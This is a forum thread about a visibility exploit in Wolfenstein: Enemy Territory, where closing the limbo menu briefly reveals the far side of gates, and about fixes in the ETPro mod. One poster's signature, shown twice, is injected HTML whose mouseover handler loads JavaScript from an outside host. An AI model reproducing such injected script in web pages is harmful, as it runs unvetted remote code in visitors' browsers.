Limbo menu wallhack exploit?

Discussion for any ET/ETPro/BayonET bugs or cheats you find...

Moderators: Forum moderators, developers

mortis

Limbo menu wallhack exploit?

Post by mortis »

I've noticed for a while now, that if you stand adjacent to a constructible entity that blocks vis, such as the "main gate" or "depot gate" in Supplydepot for example, when you close the limbo menu, it allows you to briefly see through the solid brush as if it wasn't there. The duration of this glimpse is <.5 sec, but it is long enough to see if people are on the other side, and where they are located.

Conceivably, if there is a way to script opening and closing of the limbo menu with a short wait state here and there, perhaps a vstr exploit could be created that would allow you to 'flicker' the door and see the other side like a choppy movie. I'm reasonably sure this is a game engine exploit not particular to certain video cards or drivers.

There is a thread over at Et-center where we have been discussing remaining bugs in Supplydepot, when this item came up. http://www.forums-center.com/viewtopic. ... sc&start=0 The thread also includes a demo demonstrating the bug. I informed them though I would not be able to fix this with a simple etpromapscript, and that a bug of this sort is somewhat more difficult to fix.

Perhaps bani or the other etpro code monkeys around here could shed some light on this situation....

--Mortis
WeblionX

Post by WeblionX »

The best bet to fixing it is giving the cheaters computers so fast it calculates the vis data before the person can see. ;x

The thing is that a constructible doesn't really block VIS (or general sight) in the way a wall would. The best you could do is have all brush entities always drawn. Since, I believe, when in the limbo menu it changes the camera position to what you have in the tiny video window. It might be possible to have it kind of preload the data for where you are when you close the menu, or even keep it loaded the entire time.
Got any old idtech3 tutorials you made or saved? Send them my way.
bani
Site Admin

Post by bani »

this is a pvs issue with the way limbo cameras are handled in ET. it has nothing to do with brushes and it's not an engine bug. it can be fixed in the mod.
mouse

Post by mouse »

its the same effect as freefloating out of the pvs in a demo, you cant see objectives and doors there.
mortis

Post by mortis »

Well, I suppose I will have to wait for etpro 3.2.3 or higher, I suppose....lol. It would be nice to nip a potential exploit in the bud. :D

Lol, when I said 'bug' I meant 'exploit' of the game engine; that is to say that it was not an individual map issue. I'm pretty sure that the use of the limbo menu to 'peek' through walls was not a feature intended for use in the game.

I knew the limbo camera can behave oddly at times but I didn't know how exactly that they interact with the game. I wish I had the time like when I was younger to study the Q3 engine more. I can do fifty times more in Unrealed that I can ever hope to do in Radiant.

I guess I'll just have to settle for bug-fixing, forum-haunting, and part-time bani-bugging. :shock:

--Mortis
ouroboro

Post by ouroboro »

bani wrote:this is a pvs issue with the way limbo cameras are handled in ET. it has nothing to do with brushes and it's not an engine bug. it can be fixed in the mod.
would it also fix this?
bani
Site Admin

Post by bani »

no, that's a map design flaw.
Rain

Re: Limbo menu wallhack exploit?

Post by Rain »

mortis wrote:The duration of this glimpse is <.5 sec, but it is long enough to see if people are on the other side, and where they are located.
The problem that prevents you from seeing the the brush model also prevents you from seeing anything beyond it (namely, players.) This reduces the problem to, at most, an annoyance.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
mortis

Post by mortis »

I'll have to do some more testing of this tonight, I swear that I recall being able to see players on the other side of the gate. Even more so with the problem described by ouroboro, although bani states that these are two different effects.

What can be done about ouroboro's problem from a scripting point of view, if anything, btw?

--Mortis
bani
Site Admin

Post by bani »

might be possible to spawn a misc_vis_dummy from etpro scripts, with the door as the target.

in the long run it would be better to add a new portal type just for pvs repair.
Rain

Post by Rain »

There are exceptions to this rule (as bani pointed out with the supply depot demo posted elsewhere), but cases where this can actually happen should be few and far between.

There's really not an efficient way to fix this automatically. On the maps it does occur with (e.g. supply depot), the vis_dummy idea bani just suggested is probably the best idea, but this will have to be done manually. I'm not 100% sure vis_dummy ents will work properly if spawned from a map script, but it's certainly worth trying.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
Spoofeh

Post by Spoofeh »

Rain wrote:There's really not an efficient way to fix this automatically.
Disable limbo cam?
bani
Site Admin

Post by bani »

fix for this exploit will be in the next etpro testrelease.
jump3r

Post by jump3r »

bani wrote:fix for this exploit will be in the next etpro testrelease.
[offtopic] revive the listen server option also, plskthx :)
Lagger

Post by Lagger »

jUmp3r wrote:[offtopic] revive the listen server option also, plskthx :)
I'm guessing bani's answer is: nevar!